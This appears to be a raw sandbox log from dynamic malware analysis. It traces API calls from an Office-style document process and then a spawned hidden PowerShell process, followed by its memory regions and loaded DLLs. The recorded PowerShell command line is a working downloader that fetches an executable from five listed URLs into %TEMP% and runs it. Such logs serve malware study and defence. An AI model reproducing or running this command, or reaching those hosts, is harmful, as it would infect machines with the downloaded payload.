[0138.300] VirtualFree (lpAddress=0x6de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.301] VirtualFree (lpAddress=0x6df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.302] VirtualFree (lpAddress=0x6f90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.303] VirtualFree (lpAddress=0x6fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.304] VirtualFree (lpAddress=0x6fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.306] VirtualFree (lpAddress=0x9800000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.307] VirtualFree (lpAddress=0x9810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.308] VirtualFree (lpAddress=0x9820000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.309] VirtualFree (lpAddress=0x9930000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.310] VirtualFree (lpAddress=0x9b40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.311] VirtualFree (lpAddress=0x9b50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.313] VirtualFree (lpAddress=0x9b60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.314] VirtualFree (lpAddress=0x9e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.315] VirtualFree (lpAddress=0x9e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.316] VirtualFree (lpAddress=0x9e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.317] VirtualFree (lpAddress=0x9e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.318] VirtualFree (lpAddress=0x9eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.319] VirtualFree (lpAddress=0xa0c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.321] CRetailMalloc_Free () returned 0x18a0001 [0138.321] CRetailMalloc_Free () returned 0x34f0001 [0138.321] CRetailMalloc_Free () returned 0x1 [0138.321] CRetailMalloc_Realloc () returned 0x0 [0138.321] CRetailMalloc_Alloc () returned 0x86e6048 [0138.321] CRetailMalloc_Free () returned 0x3a40001 [0138.321] CRetailMalloc_Free () returned 0x39f0001 [0138.321] CRetailMalloc_Free () returned 0x7c40001 [0138.321] CRetailMalloc_Free () returned 0x1 [0138.321] CRetailMalloc_Free () returned 0x3bd0001 [0138.321] CRetailMalloc_Free () returned 0x6770001 [0138.321] CRetailMalloc_Free () returned 0x1670001 [0138.321] CRetailMalloc_Free () returned 0x3b20001 [0138.321] CRetailMalloc_Free () returned 0x3a60001 [0138.321] CRetailMalloc_Free () returned 0x1 [0138.321] CRetailMalloc_Free () returned 0x1a60001 [0138.321] CRetailMalloc_Free () returned 0x9c0001 [0138.321] CRetailMalloc_Free () returned 0x14c0001 [0138.322] CRetailMalloc_Free () returned 0xca20001 [0138.322] CRetailMalloc_Alloc () returned 0x876d018 [0138.322] CRetailMalloc_Free () returned 0x1a20001 [0138.322] CRetailMalloc_Realloc () returned 0x0 [0138.322] CRetailMalloc_Alloc () returned 0x86e6088 [0138.322] CRetailMalloc_Free () returned 0x3a60001 [0138.322] CRetailMalloc_Free () returned 0x4490001 [0138.322] CRetailMalloc_Free () returned 0x6ec0001 [0138.322] CRetailMalloc_Free () returned 0x1 [0138.322] CRetailMalloc_Free () returned 0x44e0001 [0138.322] CRetailMalloc_Free () returned 0x7640001 [0138.323] CRetailMalloc_Free () returned 0x1890001 [0138.323] CRetailMalloc_Free () returned 0x3b60001 [0138.323] CRetailMalloc_Free () returned 0x3ae0001 [0138.323] CRetailMalloc_Free () returned 0x1 [0138.323] CRetailMalloc_Free () returned 0x1970001 [0138.323] CRetailMalloc_Free () returned 0xc3a0001 [0138.323] CRetailMalloc_Free () returned 0x6590001 [0138.327] CRetailMalloc_Free () returned 0x3020001 [0138.327] CRetailMalloc_Free () returned 0x570001 [0138.327] CRetailMalloc_Free () returned 0x2650001 [0138.327] CRetailMalloc_Free () returned 0x1fd0001 [0138.596] CExposedDocFile::Release () returned 0x2 [0138.596] CExposedDocFile::Release () returned 0x1 [0138.596] CRetailMalloc_Free () returned 0x34a0001 [0138.596] CRetailMalloc_Free () returned 0x2d20001 [0138.597] CExposedDocFile::Release () returned 0x0 [0138.597] CExposedDocFile::Release () returned 0x0 [0138.597] CRetailMalloc_Realloc () returned 0x0 [0138.597] CRetailMalloc_Alloc () returned 0x86e5f88 [0138.597] CRetailMalloc_Free () returned 0x39a0001 [0138.597] CRetailMalloc_Free () returned 0x3db0001 [0138.597] CRetailMalloc_Free () returned 0x69e0001 [0138.598] CRetailMalloc_Free () returned 0x18e0001 [0138.598] CRetailMalloc_Free () returned 0x1 [0138.598] CRetailMalloc_Free () returned 0xc9e0001 [0138.598] CRetailMalloc_Free () returned 0x3e50001 [0138.598] CRetailMalloc_Free () returned 0x6650001 [0138.598] CRetailMalloc_Free () returned 0x1de0001 [0138.598] CRetailMalloc_Free () returned 0x3ba0001 [0138.598] CRetailMalloc_Free () returned 0x38e0001 [0138.598] CRetailMalloc_Free () returned 0x1 [0138.598] CRetailMalloc_Free () returned 0xc320001 [0138.598] CRetailMalloc_Free () returned 0xc820001 [0138.598] CRetailMalloc_Free () returned 0x16a0001 [0138.599] CRetailMalloc_Free () returned 0x1c20001 [0138.599] CRetailMalloc_Free () returned 0x1990001 [0138.599] CRetailMalloc_Free () returned 0x3c20001 [0138.609] CRetailMalloc_Free () returned 0x2310001 [0139.607] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x1c, wParam=0x0, lParam=0x878) returned 0x0 [0139.959] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0139.959] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0139.959] DeleteDC (hdc=0x1d010800) returned 1 [0139.960] FreeLibrary (hLibModule=0x74320000) returned 1 [0139.960] GlobalDeleteAtom (nAtom=0xc12c) returned 0x0 [0139.960] CRetailMalloc_Free () returned 0x6b0201 [0139.960] CRetailMalloc_Free () returned 0x110201 [0139.960] CRetailMalloc_Free () returned 0xa6a0001 [0140.180] CRetailMalloc_Free () returned 0x1 [0140.180] CRetailMalloc_Free () returned 0x2060001 [0140.180] CRetailMalloc_Free () returned 0x68f0001 [0140.181] CRetailMalloc_Free () returned 0x8930001 [0140.181] DllDebugObjectRPCHook () returned 0x1 [0140.183] ComPs_NdrDllCanUnloadNow () returned 0x1 [0140.227] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0140.228] FreeLibrary (hLibModule=0x66f00000) returned 1 Thread: id = 22 os_tid = 0xa90 Thread: id = 27 os_tid = 0xabc Thread: id = 42 os_tid = 0x860 Thread: id = 43 os_tid = 0x870 Thread: id = 44 os_tid = 0x6f8 Thread: id = 45 os_tid = 0x8a0 Thread: id = 46 os_tid = 0x8b4 Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x5a03000" os_pid = "0xa94" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x974" cmd_line = "powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}" cur_dir = "C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e539" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 620 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 621 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 622 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 623 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 624 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 625 start_va = 0x22160000 end_va = 0x221d1fff entry_point = 0x22167363 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 626 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 627 start_va = 0x77850000 end_va = 0x779cffff entry_point = 0x77850000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 628 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 629 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 630 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 631 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 632 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 633 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 634 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 635 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 636 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 637 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 638 start_va = 0x73f80000 end_va = 0x73f87fff entry_point = 0x73f820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 639 start_va = 0x73f90000 end_va = 0x73febfff entry_point = 0x73fcf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 640 start_va = 0x73ff0000 end_va = 0x7402efff entry_point = 0x7401de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 641 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 642 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 643 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 644 start_va = 0x756c0000 end_va = 0x757cffff entry_point = 0x756d32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 645 start_va = 0x75800000 end_va = 0x75845fff entry_point = 0x75807478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 646 start_va = 0x77450000 end_va = 0x7756efff entry_point = 0x0 region_type = private name = "private_0x0000000077450000" filename = "" Region: id = 647 start_va = 0x77570000 end_va = 0x77669fff entry_point = 0x0 region_type = private name = "private_0x0000000077570000" filename = "" Region: id = 648 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 649 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 650 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 651 start_va = 0x73620000 end_va = 0x73669fff entry_point = 0x73622e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 652 start_va = 0x74cd0000 end_va = 0x74ce3fff entry_point = 0x74cd1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 653 start_va = 0x753a0000 end_va = 0x753abfff entry_point = 0x753a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 654 start_va = 0x753b0000 end_va = 0x7540ffff entry_point = 0x753ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 655 start_va = 0x757d0000 end_va = 0x757e8fff entry_point = 0x757d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 656 start_va = 0x75a50000 end_va = 0x75adffff entry_point = 0x75a66343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 657 start_va = 0x75c60000 end_va = 0x75d5ffff entry_point = 0x75c7b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 658 start_va = 0x75df0000 end_va = 0x75e7efff entry_point = 0x75df3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 659 start_va = 0x75e80000 end_va = 0x75f6ffff entry_point = 0x75e90569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 660 start_va = 0x761a0000 end_va = 0x761f6fff entry_point = 0x761b9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 661 start_va = 0x76200000 end_va = 0x7635bfff entry_point = 0x7624ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 662 start_va = 0x77140000 end_va = 0x771ebfff entry_point = 0x7714a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 663 start_va = 0x77310000 end_va = 0x773acfff entry_point = 0x77343fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 664 start_va = 0x773b0000 end_va = 0x7744ffff entry_point = 0x773c49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 665 start_va = 0x77820000 end_va = 0x77829fff entry_point = 0x778236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 666 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 667 start_va = 0x440000 end_va = 0x5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 668 start_va = 0x75630000 end_va = 0x7568ffff entry_point = 0x7564158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 669 start_va = 0x76fb0000 end_va = 0x7707bfff entry_point = 0x76fb168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 670 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 671 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 672 start_va = 0x80000 end_va = 0x82fff entry_point = 0x80000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 673 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 674 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 675 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 676 start_va = 0x3d0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 677 start_va = 0x5d0000 end_va = 0x750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 678 start_va = 0x760000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 679 start_va = 0x75310000 end_va = 0x7538ffff entry_point = 0x753237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 680 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 681 start_va = 0x1b60000 end_va = 0x1c3efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 682 start_va = 0x1cc0000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 683 start_va = 0x75420000 end_va = 0x754a2fff entry_point = 0x754223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 684 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 685 start_va = 0x76360000 end_va = 0x76fa9fff entry_point = 0x763e1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 686 start_va = 0x73ab0000 end_va = 0x73abafff entry_point = 0x73ab1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 687 start_va = 0x73ac0000 end_va = 0x73ad6fff entry_point = 0x73ac1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 691 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 692 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 693 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 694 start_va = 0x1d00000 end_va = 0x1fcefff entry_point = 0x1d00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 695 start_va = 0x2100000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 696 start_va = 0x2170000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 697 start_va = 0x68da0000 end_va = 0x68e94fff entry_point = 0x68db0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 698 start_va = 0x73c20000 end_va = 0x73dbdfff entry_point = 0x73c4e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 699 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 700 start_va = 0x756a0000 end_va = 0x756b1fff entry_point = 0x756a1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 701 start_va = 0x758b0000 end_va = 0x75a4cfff entry_point = 0x758b17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 702 start_va = 0x75d60000 end_va = 0x75d86fff entry_point = 0x75d658b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 703 start_va = 0x21b0000 end_va = 0x25a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 704 start_va = 0x68d70000 end_va = 0x68d90fff entry_point = 0x68d7145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 705 start_va = 0x75850000 end_va = 0x75894fff entry_point = 0x758511e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 706 start_va = 0x390000 end_va = 0x3adfff entry_point = 0x390000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 707 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 708 start_va = 0x1fd0000 end_va = 0x20cffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 709 start_va = 0x2690000 end_va = 0x26cffff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 710 start_va = 0x2720000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 711 start_va = 0x68220000 end_va = 0x6826bfff entry_point = 0x68222c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 712 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 713 start_va = 0x66ed0000 end_va = 0x66efdfff entry_point = 0x66ed1bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 714 start_va = 0x74d80000 end_va = 0x74d88fff entry_point = 0x74d8153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 715 start_va = 0x673a0000 end_va = 0x6740ffff entry_point = 0x673a1f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 716 start_va = 0x67380000 end_va = 0x67398fff entry_point = 0x67381319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 717 start_va = 0x2630000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 718 start_va = 0x2810000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 719 start_va = 0x67370000 end_va = 0x6737afff entry_point = 0x67371200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 720 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 721 start_va = 0x74590000 end_va = 0x74599fff entry_point = 0x74594d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 722 start_va = 0x73600000 end_va = 0x73615fff entry_point = 0x73602dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 723 start_va = 0x68f60000 end_va = 0x68f9afff entry_point = 0x68f6128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 724 start_va = 0x691b0000 end_va = 0x69229fff entry_point = 0x691b1f48 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 747 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 748 start_va = 0x2920000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 749 start_va = 0x66870000 end_va = 0x6690afff entry_point = 0x6687232b region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 750 start_va = 0x66950000 end_va = 0x66efafff entry_point = 0x669a3dc0 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 753 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 754 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 755 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = 